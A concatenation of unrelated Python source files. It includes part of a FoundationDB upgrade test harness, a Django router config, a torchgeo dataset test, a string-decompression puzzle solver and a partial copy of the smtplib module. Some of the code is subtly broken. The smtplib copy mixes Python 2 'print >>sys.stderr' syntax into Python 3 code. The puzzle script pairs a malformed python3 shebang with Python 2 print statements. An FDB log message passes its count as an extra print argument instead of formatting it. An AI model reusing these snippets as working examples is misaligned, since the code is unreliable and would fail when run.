version, "fdbcli", "fdbcli.{}".format(self.platform), True
)
self.download_old_binary(
version, "libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False
)
# Create a directory for external client libraries for MVC and fill it
# with the libraries necessary for the specified upgrade path
def create_external_lib_dir(self):
self.external_lib_dir = self.tmp_dir.joinpath("client_libs")
self.external_lib_dir.mkdir(parents=True)
for version in self.used_versions:
src_file_path = self.lib_dir(version).joinpath("libfdb_c.so")
assert src_file_path.exists(), "{} does not exist".format(src_file_path)
target_file_path = self.external_lib_dir.joinpath(
"libfdb_c.{}.so".format(version)
)
shutil.copyfile(src_file_path, target_file_path)
# Perform a health check of the cluster: Use fdbcli status command to check if the number of
# server processes and their versions are as expected
def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC):
retries = 0
while retries < timeout_sec:
retries += 1
status = self.cluster.get_status()
if "processes" not in status["cluster"]:
print("Health check: no processes found. Retrying")
time.sleep(1)
continue
num_proc = len(status["cluster"]["processes"])
if num_proc != self.cluster.process_number:
print(
"Health check: {} of {} processes found. Retrying".format(
num_proc, self.cluster.process_number
)
)
time.sleep(1)
continue
for (_, proc_stat) in status["cluster"]["processes"].items():
proc_ver = proc_stat["version"]
assert (
proc_ver == self.cluster_version
), "Process version: expected: {}, actual: {}".format(
self.cluster_version, proc_ver
)
print("Health check: OK")
return
assert False, "Health check: Failed"
# Create and save a cluster configuration for the given version
def configure_version(self, version):
self.cluster.fdbmonitor_binary = self.binary_path(version, "fdbmonitor")
self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver")
self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli")
self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version)
if version_before(version, "7.1.0"):
self.cluster.use_legacy_conf_syntax = True
self.cluster.save_config()
self.cluster_version = version
# Upgrade the cluster to the given version
def upgrade_to(self, version):
print("Upgrading to version {}".format(version))
self.cluster.stop_cluster()
self.configure_version(version)
self.cluster.ensure_ports_released()
self.cluster.start_cluster()
print("Upgraded to {}".format(version))
def __enter__(self):
print("Starting cluster version {}".format(self.cluster_version))
self.cluster.start_cluster()
self.cluster.create_database(enable_tenants=False)
return self
def __exit__(self, xc_type, exc_value, traceback):
self.cluster.stop_cluster()
shutil.rmtree(self.tmp_dir)
# Determine FDB API version matching the upgrade path
def determine_api_version(self):
self.api_version = api_version_from_str(CURRENT_VERSION)
for version in self.used_versions:
self.api_version = min(api_version_from_str(version), self.api_version)
# Start the tester to generate the workload specified by the test file
def exec_workload(self, test_file):
self.tester_retcode = 1
try:
self.determine_api_version()
cmd_args = [
self.tester_bin,
"--cluster-file",
self.cluster.cluster_file,
"--test-file",
test_file,
"--external-client-dir",
self.external_lib_dir,
"--disable-local-client",
"--input-pipe",
self.input_pipe_path,
"--output-pipe",
self.output_pipe_path,
"--api-version",
str(self.api_version),
"--log",
"--log-dir",
self.log,
"--tmp-dir",
self.tmp_dir,
"--transaction-retry-limit",
str(TRANSACTION_RETRY_LIMIT),
"--stats-interval",
str(TESTER_STATS_INTERVAL_SEC*1000)
]
if RUN_WITH_GDB:
cmd_args = ["gdb", "-ex", "run", "--args"] + cmd_args
print(
"Executing test command: {}".format(
" ".join([str(c) for c in cmd_args])
)
)
self.tester_proc = subprocess.Popen(
cmd_args, stdout=sys.stdout, stderr=sys.stderr
)
self.tester_retcode = self.tester_proc.wait()
self.tester_proc = None
if self.tester_retcode != 0:
print("Tester failed with return code {}".format(self.tester_retcode))
except Exception:
print("Execution of test workload failed")
print(traceback.format_exc())
finally:
# If the tester failed to initialize, other threads of the test may stay
# blocked on trying to open the named pipes
if self.ctrl_pipe is None or self.output_pipe is None:
print("Tester failed before initializing named pipes. Aborting the test")
os._exit(1)
# Perform a progress check: Trigger it and wait until it is completed
def progress_check(self):
self.progress_event.clear()
os.write(self.ctrl_pipe, b"CHECK\n")
self.progress_event.wait(None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC)
if self.progress_event.is_set():
print("Progress check: OK")
else:
assert False, "Progress check failed after upgrade to version {}".format(
self.cluster_version
)
# The main function of a thread for reading and processing
# the notifications received from the tester
def output_pipe_reader(self):
try:
print("Opening pipe {} for reading".format(self.output_pipe_path))
self.output_pipe = open(self.output_pipe_path, "r")
for line in self.output_pipe:
msg = line.strip()
print("Received {}".format(msg))
if msg == "CHECK_OK":
self.progress_event.set()
self.output_pipe.close()
except Exception as e:
print("Error while reading output pipe", e)
print(traceback.format_exc())
# Execute the upgrade test workflow according to the specified
# upgrade path: perform the upgrade steps and check success after each step
def exec_upgrade_test(self):
print("Opening pipe {} for writing".format(self.input_pipe_path))
self.ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY)
try:
self.health_check()
self.progress_check()
random_sleep(0.0, 2.0)
for entry in self.upgrade_path[1:]:
if entry == "wiggle":
self.cluster.cluster_wiggle()
else:
assert entry in self.used_versions, "Unexpected entry in the upgrade path: {}".format(entry)
self.upgrade_to(entry)
self.health_check()
self.progress_check()
os.write(self.ctrl_pipe, b"STOP\n")
finally:
os.close(self.ctrl_pipe)
# Kill the tester process if it is still alive
def kill_tester_if_alive(self, workload_thread):
if not workload_thread.is_alive():
return
if self.tester_proc is not None:
try:
print("Killing the tester process")
self.tester_proc.kill()
workload_thread.join(5)
except Exception:
print("Failed to kill the tester process")
# The main method implementing the test:
# - Start a thread for generating the workload using a tester binary
# - Start a thread for reading notifications from the tester
# - Trigger the upgrade steps and checks in the main thread
def exec_test(self, args):
self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester")
assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin)
self.tester_proc = None
test_retcode = 1
try:
workload_thread = Thread(target=self.exec_workload, args=(args.test_file,))
workload_thread.start()
reader_thread = Thread(target=self.output_pipe_reader)
reader_thread.start()
self.exec_upgrade_test()
test_retcode = 0
except Exception:
print("Upgrade test failed")
print(traceback.format_exc())
self.kill_tester_if_alive(workload_thread)
finally:
workload_thread.join(5)
reader_thread.join(5)
self.kill_tester_if_alive(workload_thread)
if test_retcode == 0:
test_retcode = self.tester_retcode
return test_retcode
def grep_logs_for_events(self, severity):
return (
subprocess.getoutput(
"grep -r 'Severity=\"{}\"' {}".format(
severity, self.cluster.log.as_posix()
)
)
.rstrip()
.splitlines()
)
# Check the cluster log for errors
def check_cluster_logs(self, error_limit=100):
sev40s = (
subprocess.getoutput(
"grep -r 'Severity=\"40\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
err_cnt = 0
for line in sev40s:
# When running ASAN we expect to see this message. Boost coroutine should be using the
# correct asan annotations so that it shouldn't produce any false positives.
if line.endswith(
"WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false "
"positives in some cases! "
):
continue
if err_cnt < error_limit:
print(line)
err_cnt += 1
if err_cnt > 0:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails",
err_cnt,
)
else:
print("No errors found in logs")
return err_cnt == 0
# Check the server and client logs for warnings and dump them
def dump_warnings_in_logs(self, limit=100):
sev30s = (
subprocess.getoutput(
"grep -r 'Severity=\"30\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
if len(sev30s) == 0:
print("No warnings found in logs")
else:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format(
len(sev30s)
)
)
for line in sev30s[:limit]:
print(line)
# Dump the last cluster configuration and cluster logs
def dump_cluster_logs(self):
for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file))
with open(etc_file, "r") as f:
print(f.read())
for log_file in glob.glob(os.path.join(self.cluster.log, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file))
with open(log_file, "r") as f:
print(f.read())
if __name__ == "__main__":
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""
A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster,
generates a workload using fdb_c_api_tester with a specified test file, and performs
cluster upgrade according to the specified upgrade path. Checks if the workload successfully
progresses after each upgrade step.
""",
)
parser.add_argument(
"--build-dir",
"-b",
metavar="BUILD_DIRECTORY",
help="FDB build directory",
required=True,
)
parser.add_argument(
"--upgrade-path",
nargs="+",
help="Cluster upgrade path: a space separated list of versions.\n" +
"The list may also contain cluster change actions: {}".format(CLUSTER_ACTIONS),
default=[CURRENT_VERSION],
)
parser.add_argument(
"--test-file",
help="A .toml file describing a test workload to be generated with fdb_c_api_tester",
required=True,
)
parser.add_argument(
"--process-number",
"-p",
help="Number of fdb processes running (default: 0 - random)",
type=int,
default=0,
)
parser.add_argument(
"--redundancy",
help="Database redundancy level (default: single)",
type=str,
default="single",
)
parser.add_argument(
"--disable-log-dump",
help="Do not dump cluster log on error",
action="store_true",
)
parser.add_argument(
"--run-with-gdb", help="Execute the tester binary from gdb", action="store_true"
)
args = parser.parse_args()
if args.process_number == 0:
args.process_number = random.randint(1, 5)
print("Testing with {} processes".format(args.process_number))
assert len(args.upgrade_path) > 0, "Upgrade path must be specified"
assert args.upgrade_path[0] in SUPPORTED_VERSIONS, "Upgrade path begin with a valid version number"
if args.run_with_gdb:
RUN_WITH_GDB = True
errcode = 1
with UpgradeTest(args) as test:
print("log-dir: {}".format(test.log))
print("etc-dir: {}".format(test.etc))
print("data-dir: {}".format(test.data))
print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster")))
errcode = test.exec_test(args)
if not test.check_cluster_logs():
errcode = 1 if errcode == 0 else errcode
test.dump_warnings_in_logs()
if errcode != 0 and not args.disable_log_dump:
test.dump_cluster_logs()
sys.exit(errcode)
|
py | 7df9fdc12df4ea883f021b36554cd6acfffc41e2 | from django.conf.urls import url
from rest_framework.routers import SimpleRouter
from django.urls import path
from rest_framework.routers import DefaultRouter
from . import views
class OptionalSlashRouter(SimpleRouter):
def __init__(self, trailing_slash='/?'):
self.trailing_slash = trailing_slash
super(SimpleRouter, self).__init__()
router = OptionalSlashRouter()
urlpatterns = [
]
router = DefaultRouter()
router.register(r'uploads', views.UploadViewSet, basename='uploads')
urlpatterns += router.urls
|
py | 7df9fe5dd2bb23a73fa87487b1777d1668a266b2 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import builtins
import os
from pathlib import Path
from typing import Any, Generator
import matplotlib.pyplot as plt
import pytest
import torch
import torch.nn as nn
from _pytest.fixtures import SubRequest
from _pytest.monkeypatch import MonkeyPatch
from torchgeo.datasets import So2Sat
pytest.importorskip("h5py")
class TestSo2Sat:
@pytest.fixture(params=["train", "validation", "test"])
def dataset(
self, monkeypatch: Generator[MonkeyPatch, None, None], request: SubRequest
) -> So2Sat:
md5s = {
"train": "2fa6b9d8995e3b6272af42719f05aaa2",
"validation": "fe3dbf74971766d5038f6cbc0b1390ae",
"test": "87d428eff44267ca642fc739cc442331",
}
monkeypatch.setattr(So2Sat, "md5s", md5s) # type: ignore[attr-defined]
root = os.path.join("tests", "data", "so2sat")
split = request.param
transforms = nn.Identity() # type: ignore[attr-defined]
return So2Sat(root, split, transforms, checksum=True)
@pytest.fixture
def mock_missing_module(
self, monkeypatch: Generator[MonkeyPatch, None, None]
) -> None:
import_orig = builtins.__import__
def mocked_import(name: str, *args: Any, **kwargs: Any) -> Any:
if name == "h5py":
raise ImportError()
return import_orig(name, *args, **kwargs)
monkeypatch.setattr( # type: ignore[attr-defined]
builtins, "__import__", mocked_import
)
def test_getitem(self, dataset: So2Sat) -> None:
x = dataset[0]
assert isinstance(x, dict)
assert isinstance(x["image"], torch.Tensor)
assert isinstance(x["label"], torch.Tensor)
def test_len(self, dataset: So2Sat) -> None:
assert len(dataset) == 10
def test_out_of_bounds(self, dataset: So2Sat) -> None:
# h5py at version 2.10.0 raises a ValueError instead of an IndexError so we
# check for both here
with pytest.raises((IndexError, ValueError)):
dataset[10]
def test_invalid_split(self) -> None:
with pytest.raises(AssertionError):
So2Sat(split="foo")
def test_not_downloaded(self, tmp_path: Path) -> None:
with pytest.raises(RuntimeError, match="Dataset not found or corrupted."):
So2Sat(str(tmp_path))
def test_plot(self, dataset: So2Sat) -> None:
x = dataset[0].copy()
dataset.plot(x, suptitle="Test")
plt.close()
dataset.plot(x, show_titles=False)
plt.close()
x["prediction"] = x["label"].clone()
dataset.plot(x)
plt.close()
def test_mock_missing_module(
self, dataset: So2Sat, mock_missing_module: None
) -> None:
with pytest.raises(
ImportError,
match="h5py is not installed and is required to use this dataset",
):
So2Sat(dataset.root)
|
py | 7df9fe87f6a468143b3189dc1bf5675d3e087c96 | #!/usrbin/python3
def decompressSize(compressed, recurse):
index = 0
size = 0
while "(" in compressed[index:]:
markerLoc = compressed[index:].find("(")
closeLoc = compressed[index:].find(")")
size += markerLoc
marker = compressed[(index+markerLoc+1):(index+closeLoc)]
markerString = "".join(marker)
splitMarker = markerString.split("x")
length = int(splitMarker[0])
multiplier = int(splitMarker[1])
substring = compressed[(index+closeLoc+1):(index+closeLoc+1+length)]
if recurse and "(" in substring:
substringSize = decompressSize(substring, recurse)
else:
substringSize = len(substring)
size += (substringSize * multiplier)
index += closeLoc + 1 + length
size += len(compressed[index:])
return size
raw = input("? ")
print decompressSize(raw, False)
print decompressSize(raw, True)
|
py | 7df9ff4ee510b2c6446b3b7ab49c2afdf782904a | #! /usr/bin/env python3
'''SMTP/ESMTP client class.
This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP
Authentication) and RFC 2487 (Secure SMTP over TLS).
Notes:
Please remember, when doing ESMTP, that the names of the SMTP service
extensions are NOT the same thing as the option keywords for the RCPT
and MAIL commands!
Example:
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> print(s.help())
This is Sendmail version 8.8.4
Topics:
HELO EHLO MAIL RCPT DATA
RSET NOOP QUIT HELP VRFY
EXPN VERB ETRN DSN
For more info use "HELP <topic>".
To report bugs in the implementation send email to
[email protected].
For local information send email to Postmaster at your site.
End of HELP info
>>> s.putcmd("vrfy","someone@here")
>>> s.getreply()
(250, "Somebody OverHere <[email protected]>")
>>> s.quit()
'''
# Author: The Dragon De Monsyne <[email protected]>
# ESMTP support, test code and doc fixes added by
# Eric S. Raymond <[email protected]>
# Better RFC 821 compliance (MAIL and RCPT, and CRLF in data)
# by Carey Evans <[email protected]>, for picky mail servers.
# RFC 2554 (authentication) support by Gerhard Haering <[email protected]>.
#
# This was modified from the Python 1.5 library HTTP lib.
import socket
import io
import re
import email.utils
import email.message
import email.generator
import base64
import hmac
import copy
import datetime
import sys
from email.base64mime import body_encode as encode_base64
__all__ = ["SMTPException", "SMTPServerDisconnected", "SMTPResponseException",
"SMTPSenderRefused", "SMTPRecipientsRefused", "SMTPDataError",
"SMTPConnectError", "SMTPHeloError", "SMTPAuthenticationError",
"quoteaddr", "quotedata", "SMTP"]
SMTP_PORT = 25
SMTP_SSL_PORT = 465
CRLF = "\r\n"
bCRLF = b"\r\n"
_MAXLINE = 8192 # more than 8 times larger than RFC 821, 4.5.3
OLDSTYLE_AUTH = re.compile(r"auth=(.*)", re.I)
# Exception classes used by this module.
class SMTPException(OSError):
"""Base class for all exceptions raised by this module."""
class SMTPNotSupportedError(SMTPException):
"""The command or option is not supported by the SMTP server.
This exception is raised when an attempt is made to run a command or a
command with an option which is not supported by the server.
"""
class SMTPServerDisconnected(SMTPException):
"""Not connected to any SMTP server.
This exception is raised when the server unexpectedly disconnects,
or when an attempt is made to use the SMTP instance before
connecting it to a server.
"""
class SMTPResponseException(SMTPException):
"""Base class for all exceptions that include an SMTP error code.
These exceptions are generated in some instances when the SMTP
server returns an error code. The error code is stored in the
`smtp_code' attribute of the error, and the `smtp_error' attribute
is set to the error message.
"""
def __init__(self, code, msg):
self.smtp_code = code
self.smtp_error = msg
self.args = (code, msg)
class SMTPSenderRefused(SMTPResponseException):
"""Sender address refused.
In addition to the attributes set by on all SMTPResponseException
exceptions, this sets `sender' to the string that the SMTP refused.
"""
def __init__(self, code, msg, sender):
self.smtp_code = code
self.smtp_error = msg
self.sender = sender
self.args = (code, msg, sender)
class SMTPRecipientsRefused(SMTPException):
"""All recipient addresses refused.
The errors for each recipient are accessible through the attribute
'recipients', which is a dictionary of exactly the same sort as
SMTP.sendmail() returns.
"""
def __init__(self, recipients):
self.recipients = recipients
self.args = (recipients,)
class SMTPDataError(SMTPResponseException):
"""The SMTP server didn't accept the data."""
class SMTPConnectError(SMTPResponseException):
"""Error during connection establishment."""
class SMTPHeloError(SMTPResponseException):
"""The server refused our HELO reply."""
class SMTPAuthenticationError(SMTPResponseException):
"""Authentication error.
Most probably the server didn't accept the username/password
combination provided.
"""
def quoteaddr(addrstring):
"""Quote a subset of the email addresses defined by RFC 821.
Should be able to handle anything email.utils.parseaddr can handle.
"""
displayname, addr = email.utils.parseaddr(addrstring)
if (displayname, addr) == ('', ''):
# parseaddr couldn't parse it, use it as is and hope for the best.
if addrstring.strip().startswith('<'):
return addrstring
return "<%s>" % addrstring
return "<%s>" % addr
def _addr_only(addrstring):
displayname, addr = email.utils.parseaddr(addrstring)
if (displayname, addr) == ('', ''):
# parseaddr couldn't parse it, so use it as is.
return addrstring
return addr
# Legacy method kept for backward compatibility.
def quotedata(data):
"""Quote data for email.
Double leading '.', and change Unix newline '\\n', or Mac '\\r' into
Internet CRLF end-of-line.
"""
return re.sub(r'(?m)^\.', '..',
re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data))
def _quote_periods(bindata):
return re.sub(br'(?m)^\.', b'..', bindata)
def _fix_eols(data):
return re.sub(r'(?:\r\n|\n|\r(?!\n))', CRLF, data)
try:
import ssl
except ImportError:
_have_ssl = False
else:
_have_ssl = True
class SMTP:
"""This class manages a connection to an SMTP or ESMTP server.
SMTP Objects:
SMTP objects have the following attributes:
helo_resp
This is the message given by the server in response to the
most recent HELO command.
ehlo_resp
This is the message given by the server in response to the
most recent EHLO command. This is usually multiline.
does_esmtp
This is a True value _after you do an EHLO command_, if the
server supports ESMTP.
esmtp_features
This is a dictionary, which, if the server supports ESMTP,
will _after you do an EHLO command_, contain the names of the
SMTP service extensions this server supports, and their
parameters (if any).
Note, all extension names are mapped to lower case in the
dictionary.
See each method's docstrings for details. In general, there is a
method of the same name to perform each SMTP command. There is also a
method called 'sendmail' that will do an entire mail transaction.
"""
debuglevel = 0
file = None
helo_resp = None
ehlo_msg = "ehlo"
ehlo_resp = None
does_esmtp = 0
default_port = SMTP_PORT
def __init__(self, host='', port=0, local_hostname=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""Initialize a new instance.
If specified, `host' is the name of the remote host to which to
connect. If specified, `port' specifies the port to which to connect.
By default, smtplib.SMTP_PORT is used. If a host is specified the
connect method is called, and if it returns anything other than a
success code an SMTPConnectError is raised. If specified,
`local_hostname` is used as the FQDN of the local host in the HELO/EHLO
command. Otherwise, the local hostname is found using
socket.getfqdn(). The `source_address` parameter takes a 2-tuple (host,
port) for the socket to bind to as its source address before
connecting. If the host is '' and port is 0, the OS default behavior
will be used.
"""
self._host = host
self.timeout = timeout
self.esmtp_features = {}
self.command_encoding = 'ascii'
self.source_address = source_address
if host:
(code, msg) = self.connect(host, port)
if code != 220:
self.close()
raise SMTPConnectError(code, msg)
if local_hostname is not None:
self.local_hostname = local_hostname
else:
# RFC 2821 says we should use the fqdn in the EHLO/HELO verb, and
# if that can't be calculated, that we should use a domain literal
# instead (essentially an encoded IP address like [A.B.C.D]).
fqdn = socket.getfqdn()
if '.' in fqdn:
self.local_hostname = fqdn
else:
# We can't find an fqdn hostname, so use a domain literal
addr = '127.0.0.1'
try:
addr = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
pass
self.local_hostname = '[%s]' % addr
def __enter__(self):
return self
def __exit__(self, *args):
try:
code, message = self.docmd("QUIT")
if code != 221:
raise SMTPResponseException(code, message)
except SMTPServerDisconnected:
pass
finally:
self.close()
def set_debuglevel(self, debuglevel):
"""Set the debug output level.
A non-false value results in debug messages for connection and for all
messages sent to and received from the server.
"""
self.debuglevel = debuglevel
def _print_debug(self, *args):
if self.debuglevel > 1:
print >>sys.stderr, datetime.datetime.now().time(), *args
else:
print >>sys.stderr, *args
def _get_socket(self, host, port, timeout):
# This makes it simpler for SMTP_SSL to use the SMTP connect code
# and just alter the socket connection bit.
if self.debuglevel > 0:
self._print_debug('connect: to', (host, port), self.source_address)
return socket.create_connection((host, port), timeout,
self.source_address)
def connect(self, host='localhost', port=0, source_address=None):
"""Connect to a host on a given port.
If the hostname ends with a colon (`:') followed by a number, and
there is no port specified, that suffix will be stripped off and the
number interpreted as the port number to use.
Note: This method is automatically invoked by __init__, if a host is
specified during instantiation.
"""
if source_address:
self.source_address = source_address
if not port and (host.find(':') == host.rfind(':')):
i = host.rfind(':')
if i >= 0:
host, port = host[:i], host[i + 1:]
try:
port = int(port)
except ValueError:
raise OSError("nonnumeric port")
if not port:
port = self.default_port
if self.debuglevel > 0:
self._print_debug('connect:', (host, port))
self.sock = self._get_socket(host, port, self.timeout)
self.file = None
(code, msg) = self.getreply()
if self.debuglevel > 0:
self._print_debug('connect:', repr(msg))
return (code, msg)
def send(self, s):
"""Send `s' to the server."""
if self.debuglevel > 0:
self._print_debug('send:', repr(s))
if hasattr(self, 'sock') and self.sock:
if isinstance(s, str):
# send is used by the 'data' command, where command_encoding
# should not be used, but 'data' needs to convert the string to
# binary itself anyway, so that's not a problem.
s = s.encode(self.command_encoding)
try:
self.sock.sendall(s)
except OSError:
self.close()
raise SMTPServerDisconnected('Server not connected')
else:
raise SMTPServerDisconnected('please run connect() first')
def putcmd(self, cmd, args=""):
"""Send a command to the server."""
if args == "":
str = '%s%s' % (cmd, CRLF)
else:
str = '%s %s%s' % (cmd, args, CRLF)
self.send(str)
def getreply(self):
"""Get a reply from the server.
Returns a tuple consisting of:
- server response code (e.g. '250', or such, if all goes well)
Note: returns -1 if it can't read response code.
- server response string corresponding to response code (multiline
responses are converted to a single, multiline string).
Raises SMTPServerDisconnected if end-of-file is reached.
"""
resp = []
if self.file is None:
self.file = self.sock.makefile('rb')
while 1:
try:
line = self.file.readline(_MAXLINE + 1)
except OSError as e:
self.close()
raise SMTPServerDisconnected("Connection unexpectedly closed: "
+ str(e))
if not line:
self.close()
raise SMTPServerDisconnected("Connection unexpectedly closed")
if self.debuglevel > 0:
self._print_debug('reply:', repr(line))
if len(line) > _MAXLINE:
self.close()
raise SMTPResponseException(500, "Line too long.")
resp.append(line[4:].strip(b' \t\r\n'))
code = line[:3]
# Check that the error code is syntactically correct.
# Don't attempt to read a continuation line if it is broken.
try:
errcode = int(code)
except ValueError:
errcode = -1
break
# Check if multiline response.
if line[3:4] != b"-":
break
errmsg = b"\n".join(resp)
if self.debuglevel > 0:
self._print_debug('reply: retcode (%s); Msg: %a' % (errcode, errmsg))
return errcode, errmsg
def docmd(self, cmd, args=""):
"""Send a command, and return its response code."""
self.putcmd(cmd, args)
return self.getreply()
# std smtp commands
def helo(self, name=''):
"""SMTP 'helo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
self.putcmd("helo", name or self.local_hostname)
(code, msg) = self.getreply()
self.helo_resp = msg
return (code, msg)
def ehlo(self, name=''):
""" SMTP 'ehlo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
self.esmtp_features = {}
self.putcmd(self.ehlo_msg, name or self.local_hostname)
(code, msg) = self.getreply()
# According to RFC1869 some (badly written)
# MTA's will disconnect on an ehlo. Toss an exception if
# that happens -ddm
if code == -1 and len(msg) == 0:
self.close()
raise SMTPServerDisconnected("Server not connected")
self.ehlo_resp = msg
if code != 250:
return (code, msg)
self.does_esmtp = 1
#parse the ehlo response -ddm
assert isinstance(self.ehlo_resp, bytes), repr(self.ehlo_resp)
resp = self.ehlo_resp.decode("latin-1").split('\n')
del resp[0]
for each in resp:
# To be able to communicate with as many SMTP servers as possible,
# we have to take the old-style auth advertisement into account,
# because:
# 1) Else our SMTP feature parser gets confused.
# 2) There are some servers that only advertise the auth methods we
# support using the old style.
auth_match = OLDSTYLE_AUTH.match(each)
if auth_match:
# This doesn't remove duplicates, but that's no problem
self.esmtp_features["auth"] = self.esmtp_features.get("auth", "") \
+ " " + auth_match.groups(0)[0]
continue
# RFC 1869 requires a space between ehlo keyword and parameters.
# It's actually stricter, in that only spaces are allowed between
# parameters, but were not going to check for that here. Note
# that the space isn't present if there are no parameters.
m = re.match(r'(?P<feature>[A-Za-z0-9][A-Za-z0-9\-]*) ?', each)
if m:
feature = m.group("feature").lower()
params = m.string[m.end("feature"):].strip()
if feature == "auth":
self.esmtp_features[feature] = self.esmtp_features.get(feature, "") \
+ " " + params
else:
self.esmtp_features[feature] = params
return (code, msg)
def has_extn(self, opt):
"""Does the server support a given SMTP service extension?"""
return opt.lower() in self.esmtp_features
def help(self, args=''):
"""SMTP 'help' command.
Returns help text from server."""
self.putcmd("help", args)
return self.getreply()[1]
def rset(self):
"""SMTP 'rset' command -- resets session."""
self.command_encoding = 'ascii'
return self.docmd("rset")
def _rset(self):
"""Internal 'rset' command which ignores any SMTPServerDisconnected error.
Used internally in the library, since the server disconnected error
should appear to the application when the *next* command is issued, if
we are doing an internal "safety" reset.
"""
try:
self.rset()
except SMTPServerDisconnected:
pass
def noop(self):
"""SMTP 'noop' command -- doesn't do anything :>"""
return self.docmd("noop")
def mail(self, sender, options=[]):
"""SMTP 'mail' command -- begins mail xfer session.
This method may raise the following exceptions:
SMTPNotSupportedError The options parameter includes 'SMTPUTF8'
but the SMTPUTF8 extension is not supported by
the server.
"""
optionlist = ''
if options and self.does_esmtp:
if any(x.lower()=='smtputf8' for x in options):
if self.has_extn('smtputf8'):
self.command_encoding = 'utf-8'
else:
raise SMTPNotSupportedError(
'SMTPUTF8 not supported by server')
optionlist = ' ' + ' '.join(options)
self.putcmd("mail", "FROM:%s%s" % (quoteaddr(sender), optionlist))
return self.getreply()
def rcpt(self, recip, options=[]):
"""SMTP 'rcpt' command -- indicates 1 recipient for this mail."""
optionlist = ''
if options and self.does_esmtp:
optionlist = ' ' + ' '.join(options)
self.putcmd("rcpt", "TO:%s%s" % (quoteaddr(recip), optionlist))
return self.getreply()
def data(self, msg):
"""SMTP 'DATA' command -- sends message data to server.
Automatically quotes lines beginning with a period per rfc821.
Raises SMTPDataError if there is an unexpected reply to the
DATA command; the return value from this method is the final
response code received when the all data is sent. If msg
is a string, lone '\\r' and '\\n' characters are converted to
'\\r\\n' characters. If msg is bytes, it is transmitted as is.
"""
self.putcmd("data")
(code, repl) = self.getreply()
if self.debuglevel > 0:
self._print_debug('data:', (code, repl))
if code != 354:
raise SMTPDataError(code, repl)
else:
if isinstance(msg, str):
msg = _fix_eols(msg).encode('ascii')
q = _quote_periods(msg)
if q[-2:] != bCRLF:
q = q + bCRLF
q = q + b"." + bCRLF
self.send(q)
(code, msg) = self.getreply()
if self.debuglevel > 0:
self._print_debug('data:', (code, msg))
return (code, msg)
def verify(self, address):
"""SMTP 'verify' command -- checks for address validity."""
self.putcmd("vrfy", _addr_only(address))
return self.getreply()
# a.k.a.
vrfy = verify
def expn(self, address):
"""SMTP 'expn' command -- expands a mailing list."""
self.putcmd("expn", _addr_only(address))
return self.getreply()
# some useful methods
def ehlo_or_helo_if_needed(self):
"""Call self.ehlo() and/or self.helo() if needed.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
"""
if self.helo_resp is None and self.ehlo_resp is None:
if not (200 <= self.ehlo()[0] <= 299):
(code, resp) = self.helo()
if not (200 <= code <= 299):
raise SMTPHeloError(code, resp)
def auth(self, mechanism, authobject, *, initial_response_ok=True):
"""Authentication command - requires response processing.
'mechanism' specifies which authentication mechanism is to
be used - the valid values are those listed in the 'auth'
element of 'esmtp_features'.
'authobject' must be a callable object taking a single argument:
data = authobject(challenge)
It will be called to process the server's challenge response; the
challenge argument it is passed will be a bytes. It should return
bytes data that will be base64 encoded and sent to the server.
Keyword arguments:
- initial_response_ok: Allow sending the RFC 4954 initial-response
to the AUTH command, if the authentication methods supports it.
"""
# RFC 4954 allows auth methods to provide an initial response. Not all
# methods support it. By definition, if they return something other
# than None when challenge is None, then they do. See issue #15014.
mechanism = mechanism.upper()
initial_response = (authobject() if initial_response_ok else None)
if initial_response is not None:
response = encode_base64(initial_response.encode('ascii'), eol='')
(code, resp) = self.docmd("AUTH", mechanism + " " + response)
else:
(code, resp) = self.docmd("AUTH", mechanism)
# If server responds with a challenge, send the response.
if code == 334:
challenge = base64.decodebytes(resp)
response = encode_base64(
authobject(challenge).encode('ascii'), eol='')
(code, resp) = self.docmd(response)
if code in (235, 503):
return (code, resp)
raise SMTPAuthenticationError(code, resp)
def auth_cram_md5(self, challenge=None):
""" Authobject to use with CRAM-MD5 authentication. Requires self.user
and self.password to be set."""
# CRAM-MD5 does not support initial-response.
if challenge is None:
return None
return self.user + " " + hmac.HMAC(
self.password.encode('ascii'), challenge, 'md5').hexdigest()
def auth_plain(self, challenge=None):
""" Authobject to use with PLAIN authentication. Requires self.user and
self.password to be set."""
return "\0%s\0%s" % (self.user, self.password)
def auth_login(self, challenge=None):
""" Authobject to use with LOGIN authentication. Requires self.user and
self.password to be set."""
if challenge is None:
return self.user
else:
return self.password
def login(self, user, password, *, initial_response_ok=True):
"""Log in on an SMTP server that requires authentication.
The arguments are:
- user: The user name to authenticate with.
- password: The password for the authentication.
Keyword arguments:
- initial_response_ok: Allow sending the RFC 4954 initial-response
to the AUTH command, if the authentication methods supports it.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
This method will return normally if the authentication was successful.
This method may raise the following exceptions:
